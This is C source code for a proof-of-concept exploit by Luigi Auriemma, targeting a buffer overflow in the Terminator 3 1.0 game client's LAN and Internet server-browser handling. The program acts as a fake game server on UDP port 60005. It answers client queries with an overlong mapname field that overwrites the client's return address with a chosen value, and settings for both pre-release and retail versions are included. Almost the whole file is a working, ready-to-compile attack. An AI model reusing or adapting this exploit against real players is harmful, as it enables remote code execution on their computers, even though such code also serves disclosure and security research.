/*

by Luigi Auriemma

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif




#define VER         "0.1.1"
#define BUFFSZ      2048
#define PORT        60005
#define GAMEVER     "800"   // 800 = pre-release
                            // 850 = retail version
#define RETADDRLAN  "\xde\xc0\xad\xde" "\0"
#define RETADDRINT  "\xde\xc0\xad\xde" "\0" GAMEVER"\0" "0\0"
//                  |                |
//                  |                final NULL byte
//                  return address
// remember that the chars a-z will be converted by
// Terminator 3 in upper case (A-Z) so if the return address
// is composed by chars as "xxxx" it will become "XXXX"




u_long get_my_ip(struct sockaddr_in peer);
void std_err(void);





int main(int argc, char *argv[]) {
    int         sd,
                on = 1,
                pcklen,
                len,
                psz;
    u_long      ip;
    struct  sockaddr_in peer;
    u_char      *buff,
                pcklan[] =          /* LAN PACKET */
                "\x00\x00\x00\x00\x00"
                "hostname\0"    "test\0"
                "gamever\0"     GAMEVER"\0"
                "gametype\0"    "0\0"
                "numplayers\0"  "8\0"
                "maxplayers\0"  "32\0"
                "mapname\0"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                pckinternet[] =     /* INTERNET PACKET */
                "\x00\x00\x00\x00\x00"
                "test\0"
                "8\0"
                "32\0"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                *pck;


    setbuf(stdout, NULL);

    fputs("\n"
        "Terminator 3 1.0 broadcast client buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    printf("\nThe game version in use (#define GAMEVER) is %s\n"
        "  800 exploits only the pre-release demo version\n"
        "  850 exploits only the retail 1.0 version\n"
        "\n"
        "To change this game version modify the source code\n"
        "\n", GAMEVER);

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("\nBinding UDP port %u\n", PORT);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sd, (struct sockaddr *)&peer, psz)
      < 0) std_err();

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    printf("The return address will be overwritten with 0x%08lx\n"
        "\nWaiting clients:\n", *(u_long *)RETADDRLAN);

    while(1) {
        pcklen = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
        if(pcklen < 0) std_err();

        if(pcklen < 16) {
            fputs("LAN      (", stdout);
            pck = pcklan;
            len = sizeof(pcklan) - 1;
        } else {
            fputs("INTERNET (", stdout);
            pck = pckinternet;
            len = sizeof(pckinternet) - 1;
        }

            // I consider 5 chars for the default 60005 port (faster)
            // The string built by the client contains also
            // the server IP address that modifies its length
        ip = get_my_ip(peer);
        if(!ip) printf("\n- Alert: I'm not able to know your local IP address so the return address on the remote client will not be correctly overwritten with 0x%08lx\n", *(u_long *)RETADDRLAN);

        len -= printf("%s", inet_ntoa(*(struct in_addr *)&ip));
        if(pcklen < 16) {
            memcpy(pck + len, RETADDRLAN, sizeof(RETADDRLAN) - 1);
            len += sizeof(RETADDRLAN) - 1;
        } else {
            memcpy(pck + len, RETADDRINT, sizeof(RETADDRINT) - 1);
            len += sizeof(RETADDRINT) - 1;
        }

        printf(") %15s:%hu\n",
            inet_ntoa(peer.sin_addr),
            htons(peer.sin_port));

        memcpy(pck, buff + 2, 5);

        if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, psz)
          < 0) std_err();
    }

    close(sd);
    return(0);
}




    /*                      IMPORTANT                        */
    /* Please contact me if you know a better method to know */
    /* the local IP address that has received the UDP packet */

u_long get_my_ip(struct sockaddr_in peer) {
    int sock,
        psz = sizeof(peer);

#ifdef WIN32
    OSVERSIONINFO   osv;
    int     i = 0;
    u_long  ip;
    struct  hostent *he;
    char    hostname[256];

    osv.dwOSVersionInfoSize = sizeof(osv);
    GetVersionEx(&osv);
    if(osv.dwPlatformId == VER_PLATFORM_WIN32_WINDOWS) {
        if(gethostname(hostname, sizeof(hostname) - 1)
          < 0) std_err();
        he = gethostbyname(hostname);
        if(!he) std_err();
        while(he->h_addr_list[i]) {
            ip = *(u_long *)he->h_addr_list[i];
                // class C, it is a workaround for Win9x
                // only so for the moment it is enough
            if(ntohl(ip ^ peer.sin_addr.s_addr) < 0xff) break;
            i++;
        }
        return(ip);
    }
#endif

    sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sock < 0) std_err();
    if(connect(sock, (struct sockaddr *)&peer, psz)
      < 0) std_err();
    if(getsockname(sock, (struct sockaddr *)&peer, &psz)
      < 0) std_err();
    close(sock);
    return(peer.sin_addr.s_addr);
}




#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


